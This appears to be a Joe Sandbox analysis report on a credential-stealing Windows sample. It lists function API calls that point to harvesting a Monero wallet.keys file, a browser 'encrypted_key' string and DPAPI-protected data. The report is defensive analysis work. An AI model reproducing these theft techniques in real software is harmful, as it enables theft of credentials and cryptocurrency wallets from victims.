                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 99eaa59f846ef21382ff4683385b26767fac76a717e4ba0543e86cced1da0e9e
                      • Instruction ID: e1dfc6a2e0840ad7928af77c0da9681efd00c9f199683127b8f67069589b6731
                      • Opcode Fuzzy Hash: 99eaa59f846ef21382ff4683385b26767fac76a717e4ba0543e86cced1da0e9e
                      • Instruction Fuzzy Hash: E8E046B4A40208BBC700EFD4DC0AA6977A8EB05702F000196F90A86280DA79AA008F96
                      Function 0046A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046A2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 0046A3FF
                      • lstrlen.KERNEL32(00000000), ref: 0046A6BC
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 0046A743
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 3693044b813882d0fe4c55fdf33ef0d4dad3f484f1d75a27ba848e313320193a
                      • Instruction ID: 2e48fa1c33489c3f82423089a53169521b683f70216fe0c6a1ce35ac5afd3685
                      • Opcode Fuzzy Hash: 3693044b813882d0fe4c55fdf33ef0d4dad3f484f1d75a27ba848e313320193a
                      • Instruction Fuzzy Hash: 5BE101728101089ACB14FBA5DC92EEE7338AF54304F51C55EF51A72091EF386A1DCB7A
                      Function 0046D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046D481
                      • lstrlen.KERNEL32(00000000), ref: 0046D698
                      • lstrlen.KERNEL32(00000000), ref: 0046D6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 0046D72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: df09a2780cde28b7545870cc1c75bd44211666e6f1cb9e8583afd4bdeec93a6a
                      • Instruction ID: 7e70d852aec6e48773f093cfc96f7e584932e6a9a8062126145ccacaf7f802c7
                      • Opcode Fuzzy Hash: df09a2780cde28b7545870cc1c75bd44211666e6f1cb9e8583afd4bdeec93a6a
                      • Instruction Fuzzy Hash: 469133719101049BCB04FBA1DC52EEE7339AF94308F51852EF11B62091EF386A19CB7B
                      Function 0046D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046D801
                      • lstrlen.KERNEL32(00000000), ref: 0046D99F
                      • lstrlen.KERNEL32(00000000), ref: 0046D9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 0046DA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: c911988b6fdd770c3664b71b3e1c34c1be0031b4a206e787fbeeab45235b06eb
                      • Instruction ID: db47bf7c755c25c4a6afb8a85471aac8b9e77e15126258a5de92407b6ed76ace
                      • Opcode Fuzzy Hash: c911988b6fdd770c3664b71b3e1c34c1be0031b4a206e787fbeeab45235b06eb
                      • Instruction Fuzzy Hash: CF8124719101049BCB04FBA5DC51EEE7339AF94304F51852EF11BA6091EF386A19CBBB
                      Function 004770D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                      Download Yara Rule
                      Strings
                      • sG, xrefs: 004772AE, 00477179, 0047717C
                      • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0047718C
                      • sG, xrefs: 00477111
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy
                      • String ID: sG$sG$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                      • API String ID: 3722407311-2141367415
                      • Opcode ID: 55ea1cfb8864e2a39a2cefdd8ffe828bd3719c9c314b2caa9f333a1ef7a272d4
                      • Instruction ID: e81e371335b8922a2bd5a0036806748dcbeb0df97fbd69a22070f493df917d8b
                      • Opcode Fuzzy Hash: 55ea1cfb8864e2a39a2cefdd8ffe828bd3719c9c314b2caa9f333a1ef7a272d4
                      • Instruction Fuzzy Hash: 045183B0D042189BDB14EBA0DC41BEEB374EF44304F5084AEE51976282EB786E88CF5D
                      Function 00473560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: bda3686f6c2e4ddf1cdb215ad0f166227c3e7830661ca54d310867d3d8e9acc7
                      • Instruction ID: ab577862e92d244677bebf88a308f5bf9b07cf71962df3e9652260dddd380fd0
                      • Opcode Fuzzy Hash: bda3686f6c2e4ddf1cdb215ad0f166227c3e7830661ca54d310867d3d8e9acc7
                      • Instruction Fuzzy Hash: E74181B1D10108AFCB04EFE5C845AEEB774AF44305F10C41EE51A77290DB78AA09DFAA
                      Function 00469CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00469D39
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469AEF
                        • Part of subcall function 00469AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00464EEE,00000000,?), ref: 00469B01
                        • Part of subcall function 00469AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NF,00000000,00000000), ref: 00469B2A
                        • Part of subcall function 00469AC0: LocalFree.KERNEL32(?,?,?,?,00464EEE,00000000,?), ref: 00469B3F
                        • Part of subcall function 00469B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00469B84
                        • Part of subcall function 00469B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00469BA3
                        • Part of subcall function 00469B60: LocalFree.KERNEL32(?), ref: 00469BD3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 6232cd773923328ddd910d3e043a260bedf30209da332b430fb004f72493aa6f
                      • Instruction ID: 7155c61c070fb25bb52d792263806b18a6a85a5d370b7895acf71c3b3d89788f
                      • Opcode Fuzzy Hash: 6232cd773923328ddd910d3e043a260bedf30209da332b430fb004f72493aa6f
                      • Instruction Fuzzy Hash: 1C3133B5D1010AABCB04DBE4DC85AEFB7BCAB44308F14452AE505A7241F7789E05CBA6
                      Function 00478680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004805B7), ref: 004786CA
                      • Process32First.KERNEL32(?,00000128), ref: 004786DE
                      • Process32Next.KERNEL32(?,00000128), ref: 004786F3
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                      • CloseHandle.KERNEL32(?), ref: 00478761
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 74e46cec694caf56f3b94658ea2bf99406a4e879b9ba6b8788fb7f12d2f05001
                      • Instruction ID: 8f865b520cd0bea4946740f49a3da77e9024b3a902e7b6e073f8e28928a0aaaa
                      • Opcode Fuzzy Hash: 74e46cec694caf56f3b94658ea2bf99406a4e879b9ba6b8788fb7f12d2f05001
                      • Instruction Fuzzy Hash: EB314D71901218ABCB24EF95CC45FEEB778EF45704F10859EE10EA21A0DB386A45CFA6
                      Function 00477980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00480E00,00000000,?), ref: 004779B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 004779B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,00480E00,00000000,?), ref: 004779C4
                      • wsprintfA.USER32 ref: 004779F3
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                      • String ID:
                      • API String ID: 377395780-0
                      • Opcode ID: 76877ae55c1203f12bf284b6c5d315f1f8fc6e8ceca9ca635aeb1017e6f94d5e
                      • Instruction ID: c740980b9b1cdac16bcaa22384d77e1a0cd6e03cd32a119ca4b25556b0b385d6
                      • Opcode Fuzzy Hash: 76877ae55c1203f12bf284b6c5d315f1f8fc6e8ceca9ca635aeb1017e6f94d5e
                      • Instruction Fuzzy Hash: CF1115B2904118AACB149FC9DD45BBEB7F9EB49B11F10421AF605A2280E33D6940CBB5
                      Function 0047C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __getptd.LIBCMT ref: 0047C74E
                        • Part of subcall function 0047BF9F: __amsg_exit.LIBCMT ref: 0047BFAF
                      • __getptd.LIBCMT ref: 0047C765
                      • __amsg_exit.LIBCMT ref: 0047C773
                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0047C797
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
